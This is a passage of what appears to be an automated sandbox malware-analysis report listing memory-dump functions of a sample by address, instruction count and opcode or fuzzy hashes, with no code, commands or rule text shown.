                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3bd1056dbc06fca99238ec897fd1118b01e299402d1347eda84b02f42d9b9184
                                                  • Instruction ID: 5c41bf906d18258a530dc353182194f0ecec1b27d82566f035a2362dadc6fbcb
                                                  • Opcode Fuzzy Hash: 3bd1056dbc06fca99238ec897fd1118b01e299402d1347eda84b02f42d9b9184
                                                  • Instruction Fuzzy Hash: 63F0F470E0A64F4AEBA49BA884383BAB3E1FF66314F00003AD81DC20E1DF745258C610
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAAAA15 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baaa000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27d9892bc8e2a169b6e2442ae380939dc893122be0810e8cc122536a2e6ab915
                                                  • Instruction ID: 0797b37cfa425c4b84ce54fcab7f4de64904a3a7eee8cade117ce4bd11877f3e
                                                  • Opcode Fuzzy Hash: 27d9892bc8e2a169b6e2442ae380939dc893122be0810e8cc122536a2e6ab915
                                                  • Instruction Fuzzy Hash: 5AF0622274E39A4FC3228799ECB11D97BB49F42215B0A41F3C259CE0A3EA5D950943A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA05D0 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3c5a6cf4783f819cb92ba855dc02e0f94db658e4934c69eaf5bcca3e28737de
                                                  • Instruction ID: 475291861982239f0d0230f9eb024fb84b2ee72665669500e6d587c70103ae13
                                                  • Opcode Fuzzy Hash: a3c5a6cf4783f819cb92ba855dc02e0f94db658e4934c69eaf5bcca3e28737de
                                                  • Instruction Fuzzy Hash: C2F0FC30A0E54E9FEB54EF65C4655F97791EF26309F01057AE80DC21E1CE75A650CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA2729 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8d4756d49dd53995f45bfb66b82771641e3e73df6cfbcc7547fd39aec195f97
                                                  • Instruction ID: 9cd792d2f8838a251b87295539f24aee16e715448d88caf0c58d83cc6d7528bd
                                                  • Opcode Fuzzy Hash: d8d4756d49dd53995f45bfb66b82771641e3e73df6cfbcc7547fd39aec195f97
                                                  • Instruction Fuzzy Hash: 9BF0F63090E38D8FDB699F6089641B97B70FF06200F4604BBD809C60E2DB78A654CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA279D Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c7f6d56b26ac65e78627b974cb294b99c9a5e24676e9f5d6ba707680457e58fa
                                                  • Instruction ID: 30cd3612c42469b1cc60cf2f654138ef7c6aa5b83762b5b073138c84c5f1a2e6
                                                  • Opcode Fuzzy Hash: c7f6d56b26ac65e78627b974cb294b99c9a5e24676e9f5d6ba707680457e58fa
                                                  • Instruction Fuzzy Hash: 3BF02B3091E78E8FE7689FA484251B93BA1FF05314F0100BFD409C10E2DF79A660CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA0FA1 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dde876ec0c9ef646fc8724d929d77a2b0164a147dc27eb565f4bfc06b41c479f
                                                  • Instruction ID: 51a4457c58413ac143f10e35dcdb4a689626bf6db4477d3236e897370da62023
                                                  • Opcode Fuzzy Hash: dde876ec0c9ef646fc8724d929d77a2b0164a147dc27eb565f4bfc06b41c479f
                                                  • Instruction Fuzzy Hash: 07F0F930E1940D8BEBA4DB58C894BEDB3B1EF58305F108266D01DA7295DE746A848F58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA8EFB Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA8000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa8000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a051c050022fdacda20b4c22505dc0dba95d933aee571741b38c6ae5758c084c
                                                  • Instruction ID: d15f4151999c99fabac66807b7c7d0544a57ae4099cccfc6c435c410eda905ad
                                                  • Opcode Fuzzy Hash: a051c050022fdacda20b4c22505dc0dba95d933aee571741b38c6ae5758c084c
                                                  • Instruction Fuzzy Hash: 29D02670A1592D8FDBA4DB4488A47A9B6B5AB59301F5100E9804DE22A1DE701A808F01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAAB20B Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baaa000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99b212d1aef731514b30aa499ce1186212eb5bb8c29bd9650bee2e263870d891
                                                  • Instruction ID: f15d135f3847180951edb1d54503e6caa785aca5c1d0589a64a2d677e0bbbe2a
                                                  • Opcode Fuzzy Hash: 99b212d1aef731514b30aa499ce1186212eb5bb8c29bd9650bee2e263870d891
                                                  • Instruction Fuzzy Hash: 52D0C930A19A1E8EEB64EB94C850FE9B371FF58304F1043F6900DE7196CE34AA818F90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  Function 00007FFD9BAC1728 Relevance: .3, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e59822aa3f85243dafe8e469a43aa7c60f6aa2b142c8a3c8e9a1e5f287313299
                                                  • Instruction ID: b3072f56b231de247b58c79517eef67056a9d19c31615222fef4cd6a7ace35c0
                                                  • Opcode Fuzzy Hash: e59822aa3f85243dafe8e469a43aa7c60f6aa2b142c8a3c8e9a1e5f287313299
                                                  • Instruction Fuzzy Hash: 5291EF31B1DA494FDB99EF5C88615B977E2FFA8300F1541BAE45DC32A2DE70AD028781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC1CFD Relevance: .2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5534332a793727b2e3dfcb531702edf6100737307504f4d31951486216454de2
                                                  • Instruction ID: 4e2af5b7763d2242f44d878ae270fa1fa02f2f34e488e9c820ebc8f0b76aa825
                                                  • Opcode Fuzzy Hash: 5534332a793727b2e3dfcb531702edf6100737307504f4d31951486216454de2
                                                  • Instruction Fuzzy Hash: 5651E230B18A894FDB5DEF1888645BA77E2FFA8300B15457EE45AC7295DE34E8028B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC3145 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce1a8dc7b24318e462d7c6801ec64211ae10db2b4605989cea619cf050789bfa
                                                  • Instruction ID: 2c0fa793a991c58a49ad5e4a214ca3ae5fb42d453295c57b1a90fa7b34ef5b56
                                                  • Opcode Fuzzy Hash: ce1a8dc7b24318e462d7c6801ec64211ae10db2b4605989cea619cf050789bfa
                                                  • Instruction Fuzzy Hash: 2F514971E0A60E8FEB64EF98C4696FCB7F1FF58300F41017AD009E72A1DA786A448B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC2115 Relevance: .1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e941f8f7d3c4a45d9628e5048af2264d31dea6a2032df4f7d98bdb068b07891
                                                  • Instruction ID: 8bcb2262d4a68e5a8c165021d861b455614b86689c97272d50b9cde971643c80
                                                  • Opcode Fuzzy Hash: 9e941f8f7d3c4a45d9628e5048af2264d31dea6a2032df4f7d98bdb068b07891
                                                  • Instruction Fuzzy Hash: E2413731B0E64A0FE765EBB884651B8B7D0EF86310B0601FBE45CC71A6DE68A9418341
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC364E Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30d99e3b9fc9b0bf5626cc286f5e2abb4adbcbb8852e94a029848360bff955dd
                                                  • Instruction ID: 9f95bd10f72cda8b6de2c232133aceba1d9a6177e87263195e7cca59a6e9373c
                                                  • Opcode Fuzzy Hash: 30d99e3b9fc9b0bf5626cc286f5e2abb4adbcbb8852e94a029848360bff955dd
                                                  • Instruction Fuzzy Hash: 8D41B572A189094FE758DF9CD8297AC7BE1EB9A354F50427ED00CC72D9CBF414018B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC1DA3 Relevance: .1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a762bdc97511cf8f12d1058d1f20d13ae7797f25ef55b4067de093e5328ec9b4
                                                  • Instruction ID: 182e1c348de8e3d373443925d43d53fc462e95a9bacb3fe9126575ab011a3a01
                                                  • Opcode Fuzzy Hash: a762bdc97511cf8f12d1058d1f20d13ae7797f25ef55b4067de093e5328ec9b4
                                                  • Instruction Fuzzy Hash: 34317030718A498FDB4CEF4C88A55BA73E2FFD8715B10467EE45AC3295CE30E8128B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC33E1 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02ffa5f2eb2a914c9fde07ab69aa7d0c2e4b1b7161e9ea24d5ca051f6f66305b
                                                  • Instruction ID: 1eb216d9c095570af86c120333679aa8b26838fec628397bc679c1ac99570ff7
                                                  • Opcode Fuzzy Hash: 02ffa5f2eb2a914c9fde07ab69aa7d0c2e4b1b7161e9ea24d5ca051f6f66305b
                                                  • Instruction Fuzzy Hash: 34219230A0A64E8FEB55EB64C8695BA77E0FF15305F0149BAD41DC71A2DF74E600CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC3465 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01ead6b8fb46f1a9996ccaf617c4783429747bef13fdda1145626c1634b56878
                                                  • Instruction ID: 15bf1e073e6753776e2f7d85ba882f5ca566260b601ca11151f793d0d26590c3
                                                  • Opcode Fuzzy Hash: 01ead6b8fb46f1a9996ccaf617c4783429747bef13fdda1145626c1634b56878
                                                  • Instruction Fuzzy Hash: F1218C30A0A68E8FEB9AEF64C5655B97BE0FF19305F0145BED41EC71A2DB75A640CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC3340 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a040897f0556abc0b68b42a8de2f60013bf76a96c7b5de3254bea64b01d41648
                                                  • Instruction ID: 5c1784f3de07e07dcc02555378502f702b503fb444bc79e0a8c74552bf9e818a
                                                  • Opcode Fuzzy Hash: a040897f0556abc0b68b42a8de2f60013bf76a96c7b5de3254bea64b01d41648
                                                  • Instruction Fuzzy Hash: D721DF3094E68A8FE792EBB488695E97FF0FF4B310B0544EAD048C71B2DA78A545CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC0A01 Relevance: .1, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8446f52c496099ac96875429f83c145a444f4f4b6bb3c5ca8ac0574f9304663a
                                                  • Instruction ID: cb192a835989d9c511436c6545b29de32d3c1aadf897f3f761b98d36edde31bf
                                                  • Opcode Fuzzy Hash: 8446f52c496099ac96875429f83c145a444f4f4b6bb3c5ca8ac0574f9304663a
                                                  • Instruction Fuzzy Hash: 9B119071A0950E8FE7A4FBA888691B97BE0FF58700F4146B6D01CC71A6EE74A6408700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC122D Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf2d5804fc0a00069252c937dbf77db65b99e4f7a3c0cf4cba7174450e75e2d5
                                                  • Instruction ID: 7e55a9322e39268cfad527ccd1750a700375da2cbf0f832fd4e3e440bdc25711
                                                  • Opcode Fuzzy Hash: bf2d5804fc0a00069252c937dbf77db65b99e4f7a3c0cf4cba7174450e75e2d5
                                                  • Instruction Fuzzy Hash: C711E274B0A64E8FEB69AFA8C4A92B97BE0FF29310F4101BED419C71E1DE746140C700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC2E31 Relevance: .1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c7be7be7fb709547865decc3b03c13dec27b7793c501bbc2fa4e9baae56aef7
                                                  • Instruction ID: 859f8add204a785de69ce8bbffff57504a6dd501d092a469613d9c3f598758e9
                                                  • Opcode Fuzzy Hash: 4c7be7be7fb709547865decc3b03c13dec27b7793c501bbc2fa4e9baae56aef7
                                                  • Instruction Fuzzy Hash: BF017131A5E64E8FE765BBA484685F97FE0EF19300F4245B6D408D70B6EB78E6448700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC05D8 Relevance: .0, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c72d700f4f83c489a23deb446a10f4d56c68065cf8b1180c70783e50c27da2b
                                                  • Instruction ID: 751e50459e907387499079d7c6d1fe329bc38b6dd98e50e5e12ae76a5bc19416
                                                  • Opcode Fuzzy Hash: 3c72d700f4f83c489a23deb446a10f4d56c68065cf8b1180c70783e50c27da2b
                                                  • Instruction Fuzzy Hash: 8F018C30B0950E8EEB58FF65C0A46B977A1EF68304F11457AE40EC31A5CA76A661CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC280D Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b3ae9c27c259630add5ee000b5b2e21655d07d52824eb5a91bdeb83c2111f0a
                                                  • Instruction ID: fba336d720f870e96e6a4ada156d814abe3e7cca72f2b712660285ac6bf5e5af
                                                  • Opcode Fuzzy Hash: 4b3ae9c27c259630add5ee000b5b2e21655d07d52824eb5a91bdeb83c2111f0a
                                                  • Instruction Fuzzy Hash: F6018430A0A64E4FE7A1BFA484695F97BE0EF59300F4245B6D408C70B5EE74E6448740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC2EA9 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99ba3d443bbfbfff2d5dc9698383627747163507dfd89f502f9d1ef647188552
                                                  • Instruction ID: 68005f29477871dc2950bededa2ebfecf9f2521d68706d3a338c4e1db3a7476a
                                                  • Opcode Fuzzy Hash: 99ba3d443bbfbfff2d5dc9698383627747163507dfd89f502f9d1ef647188552
                                                  • Instruction Fuzzy Hash: C7017131A0A64E4FE751FBB488595B97BE0EF05300F0649B3D418DB0B6DB38A6548711
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC0610 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f1eeffa79f69f6a9952a0a10de285564df4e3f5afa51dd5b137947809d63d40
                                                  • Instruction ID: db17c14ffa02a3fd7f911a9e692e597d6bb4dc78d6ab85393102664c4aa842b1
                                                  • Opcode Fuzzy Hash: 9f1eeffa79f69f6a9952a0a10de285564df4e3f5afa51dd5b137947809d63d40
                                                  • Instruction Fuzzy Hash: FE018630A1960E8FEB58FBA4C4A85B977A0FF18305F21047ED41EC71E5DF75A650CA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC0608 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6e3889b6f4594538b66ce4bf2fcfac502411413f21e780b14faf319946a871d
                                                  • Instruction ID: a94c3cce7cbd448cefa63bd12587b4f383ad42b0a0c8ad68b5ac1b2116cca7e7
                                                  • Opcode Fuzzy Hash: d6e3889b6f4594538b66ce4bf2fcfac502411413f21e780b14faf319946a871d
                                                  • Instruction Fuzzy Hash: 3E016D30A1560E8AEB68FBA4C4A86B973A0FF18304F61087ED41ED21E5DEB5A250CA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC1C7D Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ab8b86b580e3d3004a56cb0cbe31230307197a7cf51bfbf9419abbb0cb59ef6
                                                  • Instruction ID: 910071d9cece54edeae32501ee3e19bd67f79034b480a80c62987158fbaf62ef
                                                  • Opcode Fuzzy Hash: 2ab8b86b580e3d3004a56cb0cbe31230307197a7cf51bfbf9419abbb0cb59ef6
                                                  • Instruction Fuzzy Hash: 3E01D630A0E64D8FEB94EF55C4652F97BE0EF65304F41017AE808C31A2DA759650C740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC1240 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 573d725a89632feaf4d44acdb68bb8d8a64d146d93301d2d07e7bd528099a64c
                                                  • Instruction ID: e75a2d82d0f5096d13008951cfeb6d4bfdef8ce5b42bc7da235f3ea1b3699968
                                                  • Opcode Fuzzy Hash: 573d725a89632feaf4d44acdb68bb8d8a64d146d93301d2d07e7bd528099a64c
                                                  • Instruction Fuzzy Hash: 37F08174B1A65E8AEB64AFA888686BA77E0FF66215F00017AD419D21E1DE7412548640
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC05D0 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68f6fa5f9ad9336da49abe8964cff01b00e3aa1b4a2d6ca494575811bcf5f026
                                                  • Instruction ID: 4050759406b9e79b059a4b65d9b3e10ba080f1a3d43d299051a8e2a36c5dfc65
                                                  • Opcode Fuzzy Hash: 68f6fa5f9ad9336da49abe8964cff01b00e3aa1b4a2d6ca494575811bcf5f026
                                                  • Instruction Fuzzy Hash: 9DF0C830B0E54E8FEB54FF6584655F97790EF25309F11057AF80DC31A2CA75A660CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAC2729 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001B.00000002.1906198497.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_27_2_7ffd9bac0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
